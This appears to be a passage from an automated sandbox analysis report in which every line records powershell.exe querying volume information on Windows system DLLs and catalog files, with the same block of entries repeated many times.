                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
